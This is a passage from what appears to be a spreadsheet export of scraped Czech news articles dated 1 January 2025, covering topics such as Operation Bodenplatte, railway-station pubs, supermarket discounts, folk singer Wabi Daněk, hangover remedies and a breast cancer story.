hodin asi 230 pilotů. Většina z nich padla, asi 60 se pohřešovalo a někteří byli zraněni. Ztráty byly pro německé letectvo tím tíživější, že mezi ně muselo započítat i svou elitu: konkrétně dva velitele letek, šest velitelů skupin, deset kapitánů perutí a více než 200 vyšších i nižších důstojníků. Historie „Některé ztráty byly způsobeny naší vlastní protiletadlovou obranou, protože některé německé protiletadlové baterie nebyly kvůli utajení a odchylkám od plánované trasy letu informovány o tom, že nad nimi budou přelétat naše vlastní letouny, a sestřelily je. Podle aktuálních informací tak bylo zasaženo více než 30 strojů,“ píše Prinzing. Ofenziva tak měla pro Němce hořkou tečku. „Tyto vysoké ztráty znamenaly pro německou loveckou smečku definitivní konec,“ dodává Prinzing. Neúspěšná operace vedla k tomu, že se němečtí stíhací piloti v čele s Güntherem Lützowem otevřeně vzbouřili. Začali požadovat sesazení říšského leteckého maršála Hermanna Göringa z funkce vrchního velitele Luftwaffe. Třebaže Göring si svou funkci uchoval, byl brán stále méně vážně – a německé letectvo se pod jeho velením až do konce války už nikdy nevzpamatovalo. Historie Na druhé straně citelné ztráty utrpěli i Spojenci. Nejhůře je nesla 85. letecká skupina RAF , pod níž spadala většina z již zmíněných 305 sestřelených a 190 poškozených spojeneckých letounů. Podle Clostermanna ji nakonec zachránil energický zásah jejího vrchního velitele, leteckého maršála Harryho Broadhursta. „Okamžitě zmobilizoval všechny nepoškozené letouny a bez meškání zburcoval v britském leteckém parku všechny zálohy. Díky tomu bylo možno ve 24 hodinách reorganizovat několik bojových perutí k udržení fronty,“ napsal Clostermann. V operaci Bodenplatte ztratila Luftwaffe svou poslední šanci na převzetí bojové iniciativy. Od té chvíle Německo už jen sténalo pod těžkými leteckými údery, kterým nedokázalo čelit. Autor: Jaroslav Krupka Autor Jaroslav Krupka</t>
  </si>
  <si>
    <t>20250101_379_3693805959_6982921a0b72ff17c90e.html</t>
  </si>
  <si>
    <t>6982921a0b72ff17c90e</t>
  </si>
  <si>
    <t>„Mladí pochopili kouzlo karbanátku s vlašským salátem.“ Z opovrhovaných nádražek se stává kult Nádražní restaurace v Úštěku . FOTO: FORUM24/Michal Závada FOTO: FORUM24/Michal Závada Společnost 1. 1. 2025 V jednom rohu roztopená kamna, v dalším štamgast s kytarou v ruce. Všemu vévodí malba parního vlaku a výčepní pult. V nabídce je lokální pivo , klobása nebo utopenec. Tak to vypadá v restauraci na nádraží v severočeském městečku Úštěk , které leží na zrekonstruované trati Česká Lípa – Postoloprty . Je to jedna z těch klasických nádražních restaurací. Žádné sójové latté, ale turek. Místo croissantu a fresh bagety zmíněný utopenec nebo klobása na grilu, případně polévka. Mohlo by se zdát, že tyto podniky už nikoho nezajímají a rychle mizí. Opak je pravdou. I když budoucnost jim nepřeje. „My jsme tu na výletě. Dostali jsme se sem dvěma spoji, dáme si pivo a jedeme zpátky domů,“ svěřuje se dvaadvacetiletá Tereza. Je jedna z těch, kteří mají nádražky jako občasný výletní cíl. „Máme to tady moc rádi. Dobré pivo , příjemné retro prostředí. Čas od času sem zavítáme. Měli jsme tu i jednu ze zastávek, když jsme s přáteli na jaře vyrazili na cestu po nádražkách. Za jeden den jsme jeli osmi vlaky a navštívili jsme pět nádražek. Nešlo o alkohol , ale zážitky a pěkný výlet,“ rozpovídala se Tereza. Problém: vlaky až moc navazují Mezi oblíbenými nádražkami, které při zmíněné výpravě navštívila, jmenuje vyhlášenou Jedlovou. Vlaková zastávka Jedlová leží v krásném prostředí Lužických hor v nadmořské výšce 544 m. n. m. Nevede sem silnice, ale koleje ano. Je možné sem dojet vlakem od Děčína nebo od České Lípy . Přes Lípu sem jezdí také sezónní víkendový rychlík z Prahy . V jednom z posledních v tomto roce se se svým vztahem k nádražním restauracím svěřil i šedesátiletý Jirka. „Jedlová je fajn. Dobrá kuchyně, dobré pivo i prostředí. Dám si jídlo, pivko, zajdu na procházku, všude okolo jsou lesy a pak pojedu zpátky,“ popisuje své plány Jirka. „Na hodně místech už nádražky zanikly, ale pár těch pravověrných se drží. Problém je, že vlaky dnes až moc navazují. Dřív se muselo víc čekat na spoje, tak lidi do nádražky zašli,“ říká v nadsázce železniční cestovatel Jirka. „Třeba tady ve Všetatech . Teď jsem měl na přestup asi tři minuty. Kdybych měl hodinku, došel bych do zdejší dobré nádražky,“ přibližuje. Nádraží ve středočeských Všetatech leží mezi dvěma tratěmi. A mezi nimi leží i ona známá nádražka. Svět jménem Jedlová Po příjezdu vlaku přes nádhernou krajinu Lužických hor na opravenou železniční stanici Jedlová slyšíme tóny známých písniček. Je neděle a trempové sešli z lesů, dali si pivo a hrají. Kytary doprovází foukací harmonika a basa. Návštěvníci před hospodou jsou veselí, pijí kafe, pivo , jedí knedlíky, někteří tancují. Nádražka je plná k prasknutí. Personál roznáší klasické hotovky v cenách okolo 150 korun. Guláš, prejt, plněné knedlíky, kachna, španělák a tak dále. Není to tak dlouho, co se tu vyměnil provozovatel, vysokou kvalitu i pověst kultovního podniku si hospoda drží. Ve správné nádražce visí na zdi tabule s odjezdy vlaků. A tak je to i tady. „Jsme tu podruhé. Poprvé jsme jeli jen na oběd a zpátky. Dnes poobědváme, zajdeme na nedalekou zříceninu a potom zpátky. Dětem se tu moc líbí. Mají rády vlaky,“ svěřuje se Anna, která s sebou má dvě děti. A co dál? Fastfood Podobně oblíbených podniků na nádraží je po České republice celá řada. Sice oblíbené, ale s postupující rekonstrukcí nádražních budov některé mizí. Postoj Správy železnic, které patří naprostá většina nádražních budov v zemi, je jasný. Budoucností nejsou klasické nádražky, ale kavárny a fastfoody. „Obecně jsou v dnešní době upřednostňovány fastfoody a bistra, a to díky rychlosti, cenové dostupnosti a pohodlí. Cestující na nádražích tráví mnohem méně času, rychlá obsluha je tak pro ně stěžejní. Fastfood restaurace nabízejí rozmanitou nabídku jídel, jsou schopny rychle reagovat na měnící se preference zákazníků a přizpůsobovat svou nabídku například rostlinnými variantami jídel, mezinárodní kuchyní atp. To oslovuje mladší zákazníky, kteří preferují vegetariánskou nebo veganskou stravu. Na nádražích jsou také velmi oblíbené kavárny a pekárny s doplňkovým prodejem teplých a studených nápojů. Sami provozovatelé nabízejí nové koncepty a trendy zaměřené na udržitelnost, které oslovují čím dál více zákazníků,“ vysvětlila pro deník FORUM 24 Nela Eberl Friebová, vedoucí tiskového oddělení Správy železnic. Fanoušci nádražek: Proč chodit jinam? Jiný názor na budoucnost nádražních restaurací mají lidé, kteří vedou portál a populární facebookovou stránku Vágus.cz. Ti jsou fanoušky nádražních restaurací, o kterých dělají pravidelné recenze a propagují je. „Kam jinam by lidé měli chodit?“ říkají v krátkém rozhovoru pro deník FORUM 24. Předpokládám, že nádražních restaurací nepřibývá, ale drží se jejich počet, nebo mizí a mizí? Nádražky naopak i přes nepřízeň osudu bují nevídaným tempem. Ostatně co je stánek před nádražím než právě embryo nádražky? O nádražkách se v poslední době více mluví. Myslíte si, že klasické nádražky nyní zažívají určitou „renesanci“ a navštěvují je nové skupiny hostů? Jednoznačně. Čím dál častěji vídáme početné party mladých, kteří zanevřeli na stylové kavárny a pochopili krásy teplého rumu nebo karbanátku s vlašským, nikoli bramborovým salátem. Existuje mezi nádražkami nějaká legendární, kterou musí každý milovník tohoto typu podniků navštívit? Je to známá Jedlová? Těžko posoudit. O Jedlové nedávno jistý autor poctivých průvodců prohlásil, že je to zaplivaná hospoda, kde mají jen pivo . Nejsme si proto jistí, zda afluentní Pražáci její půvab naplno docení. Jiné klenoty nádražního pohostinství zase mají otevíračku, která se nebezpečně kryje s pracovní dobou, tudíž poznávací zájezdy do Chrastavy , Otrokovic nebo Jablonce nutně vyžadují i svolení zaměstnavatele. Takže bychom nakonec asi doporučili Café Foyer na pražském hlavním nádraží – jen u kasy nezapomeňte říct, že vás tam poslali z Vágus.cz, možná dostanete slevu. Čím jsou pro vás nádražky tak zajímavé a lákavé? Proč je navštěvovat? Proč chodit jinam než do nádražek? Vždyť tam najdete vše, co průměrný konzument potřebuje ke štěstí. A pokud trváte na kávě z malých pražíren, znovu si kriticky zrekapitulujte své životní volby.</t>
  </si>
  <si>
    <t>220990</t>
  </si>
  <si>
    <t>20250101_38_3697496009_1ac89d0c0755c269c4b4.html</t>
  </si>
  <si>
    <t>1ac89d0c0755c269c4b4</t>
  </si>
  <si>
    <t>Zítra se budou tvořit fronty: Penny láká na velké slevy potravin, vepřová plec za 90 korun!</t>
  </si>
  <si>
    <t>Zítra se budou tvořit fronty: Penny láká na velké slevy potravin, vepřová plec za 90 korun! 1. 1. 2025 Penny připravuje velký leták plný slev. Foto: Shutterstock Penny Market připravil pro začátek roku 2025 opravdu lákavé slevy! Od 2. ledna můžete v oblíbeném řetězci nakoupit základní potraviny za ceny, které potěší každou peněženku. Supermarkety jsou si vědomi toho, že po Vánocích a oslavách nového roku máme doma prázdné ledničky a zřejmě budeme potřebovat doplnit naše tajné zásoby. S tím počítá i obchodní řetězec Penny , který pro své zákazníky přichystal lákavé slevové akce. Od zítřka tam můžete nakoupit základní potraviny za přijatelné ceny. A to se po nákladných svátcích určitě hodí, protože je naše peněženka trochu hubenější. V akci seženete například oblíbený jogurt Florian od společnosti Olma , který nyní pořídíte za pouhých 7,90 Kč. Ideální volba pro zdravou snídani či svačinu. Foto: Shutterstock Sleva na máslo i kvalitní maso na oběd Mnoho zákazníků zajímá i cena másla, která v posledních měsících raketově roste. Cena másla klesla na 54,90 Kč. Využijte této nabídky a zásobte se kvalitním máslem Boni pro vaše pečení a vaření. Pokud přemýšlíte, co budete o víkendu vařit, máme pro vás tip. Šťavnatá vepřová plec bez kosti je nyní k dispozici za 89,90 Kč. Skvělá volba pro přípravu chutných pokrmů pro celou rodinu. Milovníci piva ocení světlé výčepní pivo Radegast Rázná 10° za 13,90 Kč. Ideální osvěžení po náročném dni. A pokud máte rádu zeleninu, i vy si přijdete na své. Čerstvá cherry rajčata nyní zakoupíte za 15,90 Kč. Perfektní do salátů nebo jako zdravá svačinka. Foto: Penny Akce platí od 2. do 8. ledna Tím ale slevové akce nekončí. Sehnat v akci můžete i Kaiserke speciál za 2,90 Kč, salám šunkový Řezníkův talíř (100g balení) za 9,90 Kč, těstoviny bezvaječné Penny (500g balení) za 9,90 Kč, toaletní papír 2vrstvý Wippy (4 role) za 9,90 Kč, žervé Boni (100g balení) za 9,90 Kč nebo mléko trvanlivé Boni - 1,5% polotučné (1 litr) za 10,90 Kč. Nepropásněte tyto výhodné nabídky! Akce platí od 2. do 8. ledna 2025 ve všech prodejnách Penny Market . Zdroje: autorský text Autor: Michaela Hanelová Autor person Michaela Hanelová</t>
  </si>
  <si>
    <t>20250101_380_3693773323_d71a033087e46de13c7b.html</t>
  </si>
  <si>
    <t>d71a033087e46de13c7b</t>
  </si>
  <si>
    <t>Skutečné životy: Autor Rosy na kolejích pil půl litru tvrdého denně! Wabi Daněk utekl hrobníkovi z lopaty několikrát</t>
  </si>
  <si>
    <t>Skutečné životy: Autor Rosy na kolejích pil půl litru tvrdého denně! Wabi Daněk utekl hrobníkovi z lopaty několikrát Autor: mc - 05:00 Jeho jméno patřilo mezi jedno z nejznámějších mezi českými trampy a folkovými hudebníky. Wabi Daněk byl původně „obyčejným“ zámečníkem, od rodičů dostal ale do vínku lásku k hudbě, a tak není divu, že se nakonec dal na profesionální dráhu umělce. Dokonce se stal autorem neoficiální hymny trampů! Kvůli svému životnímu stylu skončil bohužel v protialkoholní léčebně. Několikrát utekl hrobníkovi z lopaty. Boj s rakovinou ale vyhrát nezvládl. Narodil se jako Stanislav Daněk rodičům, kteří byli zapřísáhlí skauti a Wabi tak vyrůstal za zvuků trampských písniček. Vyučil se zámečníkem a práci se také dlouhé roky věnoval. Zároveň ale vystupoval jako hudebník. Nakonec se roku 1983 stal profesionálním sólovým umělcem. Tou dobou už měl „na svědomí“ dodnes nejznámější trampskou píseň Rosa na kolejích. Ta se stala neoficiální trampskou hymnou a dokonce se jednu dobu uctívala v pozoru - i na akcích, kde bylo několik desítek tisíc lidí! A stejně oblíbený byl i sám Wabi . Odehrál i 30 koncertů měsíčně a jezdil po celé republice. „Odehrajete bezvadný koncert, jste nadupaný, sednete do auta a jedete tři čtyři hodiny domů. Přijedete, tělo je totálně mrtvé a hlava pořád šrotuje. Spolehlivý trankvilizér jsou dva panáky. Potom tři… Později zaháníte výčitky, pocity studu. A pak už to jede samo,“ řekl v rozhovoru pro Reflex. Alkohol se stal jeho patrťákem a později zabijákem. Vypil klidně půl litru tvrdého alkoholu denně. Po letech mu ale došlo, že s takovou ho opravdu brzo čeká leda rakev. Nastoupil do protialkoholní léčebny - poprvé to nevyšlo a začal znovu pít, podruhé už ale vydržel. Jenže pak přišla další rána. Nad ránem se mu po návratu z koncertu udělalo špatně a skončil v nemocnici s mrtvicí. Lékaři mu navíc objevili aneurysma a musel na operaci. V nemocnici byl čtyři měsíce, ale opět utekl hrobníkovi z lopaty. To se mu podařilo ještě několikrát - po lehkém infarktu vyšlo najevo, že zpěvák trpí vážnou nemocí jater. Obojí překonal. S rakovinou si ale poradit už nedokázal. Koncertoval do poslední možné chvíle. Naposledy vstoupil už hodně pohublý s kruhy pod očima. Zemřel v listopadu 2017 mezi svými nejbližšími. Qakina Qakina ( 1. ledna 2025 16:17 ) Wabi zpíval SVOJE písničky - vlastní text, vlastní melodie - proto byl uvěřitelný, pravdivý, oblíbený. A mimochodem pil vizoura - pro znalce cen níže. doktormediciny ( 1. ledna 2025 13:19 ) Ovsem nejznamejsi tremska pisen je Niagara ...Na brehu Niagary sedi tulak stary atd defakto ( 1. ledna 2025 11:27 ) ... jaký život, taková smrt! krtek. ( 1. ledna 2025 09:39 ) 👍 třešnovice 35 Uživatel_5881531 ( 1. ledna 2025 08:29 ) Nebyl ani první ani poslední.... Wabi Daněk Láska k druhé ženě zvítězila nad láskou k alkoholu . Wabi Daněk měl silného nepřítele - alkohol . Duben 2017: Wabi Daněk při koncertu v Brně Rok 2015: Přestože už bojoval s rakovinou, vypadal ještě zdravě. Manželka Eva byla jeho životní oporou. (Zleva) Radka Haničincová, vdova po Petru Haničincovi , Wabi Daněk , manžela Wabiho Eva a Jan Vyčítal Jedny z posledních fotek Wabiho Daňka Než zpěvák onemocněl, byl o pár kilo těžší. Pohublý Wabi Daněk vystoupil na koncertě pro válečné hrdiny. Wabi Daněk s Honzou Vyčítalem . Autor: mc Autor person mc Rubrika transition_slide Příběhy</t>
  </si>
  <si>
    <t>20250101_381_3693775332_0facdd559f5ca48a86bd.html</t>
  </si>
  <si>
    <t>0facdd559f5ca48a86bd</t>
  </si>
  <si>
    <t>Máte kocovinu? Pomůže vám banán i milování</t>
  </si>
  <si>
    <t>Máte kocovinu? Pomůže vám banán i milování Jak zatočit se silvestrovskou kocovinou? (iStock.com) Pekelné ráno po ďábelské noci? Známe to! Kocovina je neúprosnou daní za večerní eskapády, ale bez obav. Existují způsoby, jak s ní zatočit – některé vědecky podložené, jiné poněkud překvapivé. Třeba sex. Nebo banán. Během sexuální aktivity dochází k uvolňování endorfinů, což jsou hormony štěstí, které mohou zlepšit náladu a poskytnout dočasnou úlevu od bolesti. Lehká fyzická aktivita také podporuje krevní oběh a okysličení těla, což může přispět k rychlejšímu odbourávání toxinů vzniklých při metabolizaci alkoholu . Je však důležité mít na paměti, že tělo je po konzumaci alkoholu dehydratované a unavené. Proto by jakákoli fyzická aktivita, včetně sexu, měla být prováděna s mírou a ohledem na aktuální stav organismu. Ačkoliv se traduje, že nejlepší lék na kocovinu je další sklenička, heslo „co tě rozbilo, tě i spraví“ nemá žádné logické vysvětlení. Alkohol sice krátkodobě otupí příznaky, ale zároveň prodlouží celkovou dobu zotavení. Raději se soustřeďte na hydrataci pomoci jemně mineralizované vody, iontového nápoje či zázvorové limonády. Žaludek vám pak spraví vývar i obyčejný banán. Ten obsahuje draslík, který alkohol z těla vyplavuje, a cukry, jež tělu dodají rychlou energii. Jeho jemná struktura navíc nedráždí, což je při kocovině k nezaplacení. CELEBRITY RADÍ, JAK NA KOCOVINU Video se připravuje ... Autor: jic Autor person jic</t>
  </si>
  <si>
    <t>20250101_382_3693780067_67531f4aa7d3e61cae89.html</t>
  </si>
  <si>
    <t>67531f4aa7d3e61cae89</t>
  </si>
  <si>
    <t>Když má pleť kocovinu: Zázraky ze spíže i speciální masky s okamžitým efektem</t>
  </si>
  <si>
    <t>Když má pleť kocovinu: Zázraky ze spíže i speciální masky s okamžitým efektem Dlouhá noc plná zábavy se ráno často nepříjemně projeví nejen na náladě, ale také na vaší pleti. Alkohol a nedostatek spánku se na ní mohou podepsat mdlým vzhledem nebo výraznými kruhy pod očima. Naštěstí existují pleťové masky, které mohou během několika minut vrátit vaší pokožce svěžest a zdravý vzhled. Kocovina není jen otázkou ranních pocitů nevolnosti a nedostatku energie – její vliv se bohužel odráží i na naší pleti. Unavený vzhled, viditelná dehydratace, zarudnutí a otoky. To jsou běžné důsledky prohýřené nebo probdělé noci . Odpovědí na tyto problémy ale jsou vedle babských rad a rychlých domácích pomocníků také nové generace pleťových masek, které se staly oblíbeným trendem v péči o pleť. Masky proti kocovině nejen osvěží vaši pokožku, ale také dodají tváři okamžitý "glow efekt." Doporučené video: Stylistka radí, jak nenaletět ve slevách Okurka na oči i do domácí limonády Nepřipravily jste se na ráno po dlouhé noci patřičným nákupem? Nevadí, první záchranou vám mohou být produkty ze spíže či ledničky, kterými můžete své unavené pleti jednoduše dodat první pomoc . Skvěle se hodí salátová okurka. S množstvím tekutin, které obsahuje, je výbornou cestou, jak pleti i tělu dodat ztracenou hydrataci. Aplikovat ji můžete nejen tradičně nakrájenou na kolečka a přiloženou na oční víčka, namíchejte si také osvěžující okurkovou limonádu s kapkou citronu a využít můžete samozřejmě i kosmetiku s okurkovými extrakty . Mohlo by Vás zajímat: Zkrášlující terapie světlem: Strašidelná maska vyhlazuje vrásky Jitce Asterové a zatočí i s jizvami po akné S kruhy pod očima zatočí i čaj nebo med Dalším rychlým pomocníkem pro boj s viditelnými příznaky nekonečného večírku je překvapivě med. Z něj si můžete také připravit jednoduchou pleťovou masku , která zatočí s nejvýraznějšími příznaky kocoviny, jako jsou například tmavé kruhy pod očima. Kůži pod očima můžete vzpružit medem na vatovém tampónu. Med ale neroztírejte, pouze lehce nanášejte a zhruba po 20 minutách působení opláchněte teplou vodou. Na celý obličej pak můžete použít také domácí medovou masku . Její výroba je snadná. Smíchejte a vyšlehejte lžíci medu a mandlového oleje, naneste opatrně na obličej a po čtvrthodince opět z obličeje jemně smyjte teplou vodou. Stejně jako plátky okurky můžou vaším unaveným očím vybaveným otoky prospět také pytlíčky se zeleným či bílým čajem , které se postarají o zklidnění pokožky a její rehydrataci. Navlhčené, příjemně teplé sáčky jednoduše přiložte na víčka a dopřejte si ještě pár minut potřebného relaxu navíc. Mohlo by Vás zajímat: Trendy plátýnková pleťová maska: Instantní péče o obličej, která se perfektně přizpůsobí každé tváři Profesionální masky jako dokonalá první pomoc Pokud ale chcete být perfektně připraveny, můžete mít doma po ruce některou z běžně prodávaných speciálních pleťových masek navržených právě pro podobné případy. Často obsahují pro pleť přínosné a jasné životabudiče, jako je vitamín C, kyselina hyaluronová nebo látky, které jí rozjasní a rozzáří. Pořídit si je můžete ve formě oblíbené plátýnkové masky ošetřující celý obličej, nebo například ve formě speciálních polštářků pod oči .V galerii najdete také tip na lokální masku proti kocovině určenou k aplikaci na čelo. Nezapomeňte pleti také po večírku dopřát tzv. "no makeup day". Zkrátka se vyhněte jakýmkoli látkám, které by ji mohly dusit a zatěžovat, přece jen i ona potřebuje po dlouhé noci trochu odpočívat. Masky proti příznakům kocoviny, které můžete koupit v obchodech, si prohlédněte v naší fotogalerii. Galerie Když má pleť kocovinu: Zázraky ze spíže i speciální masky s okamžitým efektem + 3 fotky + 4 fotky Rozjasňující plátýnková maska, Morning Mask Hangover, Payot, 211 Kč Zdroj: Oficiální materiály prodejce Plátýnková maska After Drinking, Holika Holika, 90 Kč Hydratační gelové polštářky pod oči s osvěžujícím účinkem, Gabriella Salvete, 3x2 ks, 124 Kč Rehydratační pleťová maska s kyselinou hyaluronovou, Hyaluron Therapy 3D, Dermacol , 79 Kč Plátýnková maska s výtažky z čaje pro intenzivní vypnutí a rozjasnění pleti, White Tea Peptide Mask, Teaology, 169 Kč Zklidňující maska na čelo proti kocovině, Hangover Help Soothing Forehead Mask, Face Facts, 149 Kč Hydratační maska s kyselinou hyaluronovou inspirovaná cryoterapií, Cryo Rubber™ , Dr. Jart+, Sephora, 380 Kč Zdroj: Freepik, oficiální materiály prodejců/ koláž: Lifee Autor: Jana Elfmarková Autor person Jana Elfmarková Rubrika transition_slide krása</t>
  </si>
  <si>
    <t>20250101_383_3693811849_beb44a1f26caeabf1252.html</t>
  </si>
  <si>
    <t>beb44a1f26caeabf1252</t>
  </si>
  <si>
    <t>Temná minulost manželky legendy z Nagana. Marie Růžičková přiznala drsné dětství, tanec u tyče i boj o přežití</t>
  </si>
  <si>
    <t>Temná minulost manželky legendy z Nagana . Marie Růžičková přiznala drsné dětství, tanec u tyče i boj o přežití Marie Růžičková neměla vždy na růžích ustláno a prošla tvrdou školou života. Ve svém podcastu na platformě Hero Hero otevřela svou 13. komnatu. Promluvila nejen o těžkém dětství, o práci striptérky, ale i o zdravotních problémech, kterým čelila. Marie Růžičková neměla nejlehčí dospívání. Po odchodu z problematického domova se v osmnácti letech ocitla v drsném světě, kde musela bojovat o každou šanci na lepší život. Její první kroky vedly do Rakouska , kde si přivydělávala jako barmanka. S postupem času se však vrátila do Čech , kde se pokusila začít nový život. V pražském fastfoodu myla nádobí, ale životní podmínky ji stále nutily hledat jiné způsoby, jak se uživit. Právě tehdy přišla nabídka na práci striptérky, která se stala osudovým momentem jejího života. "Ten den, kdy jsem přijala nabídku, jsem se odstěhovala z Prahy do Chomutova ," zavzpomínala Marie ve svém podcastu na platformě Hero Hero. Marie Růžičková prošla peklem Práce striptérky pro ni byla nejen výzvou, ale i skutečnou zkouškou. Marie si uvědomovala, že tanec ji baví, ale tvrdá realita tohoto světa ji rychle zasáhla. "V tu dobu jsem byla vystavená pasivnímu kouření, byla jsem hodněkrát nemocná, měla jsem záněty močáků, ledvin. Hodněkrát jsem zkolabovala, protože jsem byla dehydratovaná, to kvůli alkoholu," svěřila se. Růžičková dnes přiznává, že práce striptérky ji ničila jak fyzicky, tak psychicky. V těžkých obdobích trpěla nejen zdravotními problémy, ale také psychickým vyčerpáním. "Zestárla jsem o dva tři roky rychleji ." Její tělo vydrželo jen díky vůli, ale i v tak těžkých podmínkách věděla, že musí nějak přežít. "Věděla jsem, že musím z něčeho žít, jinak by to nešlo," říká o čase, kdy přežívala jen na čínských polévkách a rohlících s paštikou. Růžičkovou osočili ze zlatokopectví Všechno špatné už je však minulostí, nyní je z Marie Růžičkové maminka a žije ve spokojeném manželství s hokejovou legendou, vítězem z Nagana a později trenérem mistrů světa Vladimírem Růžičkou . Avšak když se dala s bývalým hokejovým trenérem dohromady, lidé ji osočovali, že je zlatokopka. Růžičkova první manželka v roce 2016 zemřela po těžké nemoci a v následujícím roce se hokejový trenér znovu oženil. Marie pak prošla velkým terorem ze strany sledujících. "Protože jsem si našla Vláďu, tak se o mně začalo říkat, že jsem zlatokopka. Ale tedy on sbalil mě, nikoli já jeho. Ale mě označovali za tu, co rozbila rodinu, a zlatokopku. Byla jsem postavena do pozice člověka, kterým já ani nejsem," sdělila před časem v rozhovoru pro eXtra.cz . Taťána Makarenko odkryla pozadí konfliktu se Samem Dolcem. Rozešli se ve zlém, kráska mluví o zradě Autor: Kristýna Bernadová Autor person Kristýna Bernadová</t>
  </si>
  <si>
    <t>440890</t>
  </si>
  <si>
    <t>20250101_384_3693722160_800579bc323b2745d13f.html</t>
  </si>
  <si>
    <t>800579bc323b2745d13f</t>
  </si>
  <si>
    <t>Posezení u cimbálu + vystoupení ženského pěveckého sboru Dorostenky, Blansko, sobota 18.1.2025</t>
  </si>
  <si>
    <t>Posezení u cimbálu + vystoupení ženského pěveckého sboru Dorostenky, Blansko , sobota 18.1.2025 sobota 18.1.2025, Blansko 18. 1. 2025, 18:00 h Hospůdka Na Točně a Kulturní dům Těchov / Těchov Přijďte si zazpívat, poslechnout, posedět, zatancovat u vínka, piva . Ženský pěvecký sbor pod vedením Katky Šujanové a cimbálová muzika Základní umělecké školy Blansko . Zazní písně lidové, populární, povánoční i jiné Vstupné dobrovolné Sdílejte akci s přáteli! Podpoříte tím rozvoj regionu. Reklama</t>
  </si>
  <si>
    <t>20250101_385_3693705475_471271d08490e66e045b.html</t>
  </si>
  <si>
    <t>471271d08490e66e045b</t>
  </si>
  <si>
    <t>Letošní rok láká na filmový festival, kapely pod hradem i Valdštejnské slavnosti</t>
  </si>
  <si>
    <t>Letošní rok láká na filmový festival, kapely pod hradem i Valdštejnské slavnosti Koupaliště Michal v Sokolově opět nabídne řadu koncertů, závody dračích lodí, sport i relax či Shutdown Westside. V Sokolově nebude chybět akce Hurá prázdniny, kterou každoročně slaví především děti své dva měsíce volna. Lidé se také oblíbili zámecké slavnosti vína či festival jídla v zámeckém parku. Kulturní léto je nabité programem v němž je řada uměleckých a hudebních vystoupení na Starém náměstí. Vše pak vrcholí největší poutí v kraji, a to Dnem horníků. play_fill Karlovarsko Do loketského amfiteátru si našli cestu na tamní koncerty či opery si nejen místní, ale i lidé z celé České republiky a zahraničí. Z mnoha akcí lze zmínit například známé kapely Škwor , Olympic , Walda Gang. Dále to budou třeba Pražský výběr, Pumpa, The BacKbeat Beatles, Horkýže Slíže, Viktor Dyk , MIG 21, Trautenberk, Morčata na útěku, Čechomor , Mirai Summer fest a další. Promenádou známých herců po červeném koberci před karlovarským hotelem Thermal začne již 59. ročník Mezinárodního filmového festivalu Karlovy Vary . Filmového svátku v lázeňském městě se i v tomto roce účastní řada zahraničních hvězd. Bohatý bude i doprovodný program festivalu, při kterém ožijí prakticky celé Karlovy Vary . Karlovarsko V Chebu se zase každoročně střídají Valdštejnské slavnosti s FIJO festivalem dechovek a mažoretek. Letos jsou to právě Valdštejnské slavnosti. Ty mají v Chebu dlouhou historii. Pobyt vévody a jeho vražda v Chebu byly s oblibou připomínány již začátkem minulého století. Novodobé chebské Valdštejnské slavnosti se těší přízni jak obyvatel Chebu , tak i turistů z ČR i ze zahraničí. V programu slavností, který je skutečně bohatý, si najde každý to své. A to ať už se jedná o rekonstrukce momentů z Valdštejnova pobytu v Chebu , slavnostní průvody, historický jarmark na náměstí nebo další kulturní akce. Autor: Roman Cichocki Autor Roman Cichocki Rubrika transition_slide Karlovarsko</t>
  </si>
  <si>
    <t>8560</t>
  </si>
  <si>
    <t>20250101_386_3693602959_d06d5360f3dd00a0002a.html</t>
  </si>
  <si>
    <t>d06d5360f3dd00a0002a</t>
  </si>
  <si>
    <t>Lékaři jí nejprve tvrdili, že je to normální. Po pár měsících zjistili, že má mladá matka rakovinu</t>
  </si>
  <si>
    <t>Lékaři jí nejprve tvrdili, že je to normální. Po pár měsících zjistili, že má mladá matka rakovinu Mladá matka a zdravotní sestra Kristi zažila nejhorší noční můru – pokročilou rakovinu prsu, kterou lékařská vyšetření zpočátku přehlédla. Rakovina je nemoc, která nezná hranice ani pravidla. Může zasáhnout kdykoli a kohokoli, bez ohledu na věk nebo životní styl. Příběh jedné maminky ukazuje, jak zrádné může být spoléhat se jen na výsledky lékařských testů. Když ignorovala příznaky jako bolest zad nebo úbytek na váze, domnívala se, že jde o běžnou únavu z péče o dítě. Nikdo, ani ona sama, by tehdy neřekl, že se za těmito příznaky skrývá závažná diagnóza, informoval deník DailyMail. První příznaky a podcenění Kristi Halpin, 33letá zdravotní sestra z New Jersey , zažila šokující moment, kdy jí byla diagnostikována pokročilá rakovina prsu, a to jen několik týdnů poté, co její mamograf neodhalil žádné abnormality. Příznaky, které zpočátku ignorovala, vedly k osudnému zjištění. Na začátku roku 2023 začala Kristi pociťovat bolest zad, únavu, úbytek na váze a objevila se jí nevysvětlitelná podlitina. Tyto symptomy přičítala vyčerpání z péče o novorozeného syna. Když se ale bolesti zad staly nesnesitelnými, Kristi se rozhodla jednat. Během oslav prvních narozenin svého syna se bolest zhoršila natolik, že upadla na podlahu v koupelně. Myslela si, že ji trápí ucpaný nos kvůli nachlazení. Lékař jí však sdělil krutou diagnózu První vyšetření a nejistota V říjnu 2023 krevní testy naznačily problémy, které lékaři zpočátku spojovali s žlučníkem. Ve stejné době si Kristi všimla změny tvaru své bradavky, která se stáhla dovnitř, a cítila pod ní bulku. I když mamografie neukázala žádné abnormality, Kristi se svých obav nezbavila. Fotografie: Freepik Zlomový moment Kristi vyhledala specialistu, který provedl biopsii. Výsledky potvrdily, že má rakovinu prsu, která se rozšířila na páteř, žebra a plíce. Diagnóza byla devastující. „Měla jsem pocit, že se zastavil čas,“ popsala Kristi chvíli, kdy se dozvěděla verdikt. Lékaři doporučili chemoterapii a radioterapii, aby zastavili šíření rakoviny, která je však v jejím případě neléčitelná. Kristi se rozhodla sdílet svou zkušenost na sociálních sítích a upozornit na důležitost včasného rozpoznání příznaků, jako jsou bulky, změny na pokožce nebo neobvyklé otoky. Jak je důležitá včasná diagnóza rakoviny pro zvýšení šancí na přežití, jsme již napsali na ZdravémStravování. 20. února 2022 Lenka Burešová Rakovinu ledvin lze úspěšně léčit i v pokročilém stádiu. Je však potřeba věnovat větší pozornost varovným signálům a eliminovat ve svém životě rizikové faktory, které rozvoj rakoviny podporují. […] 28. října 2021 Lenka Burešová Největší strašák žen jménem rakovina vaječníků. Bojíme se jí téměř všechny, proto je velmi důležité znát její rané příznaky. […] 20. listopadu 2021 Lenka Burešová Odložení na příště se v těchto situacích opravdu nevyplácí. Rakovina pochvy přichází velmi tiše a nenápadně, ale následky můžou být definitivní. Čas už nevrátíte. […] 9. července 2024 Tereza Vohrlíková Rakovina 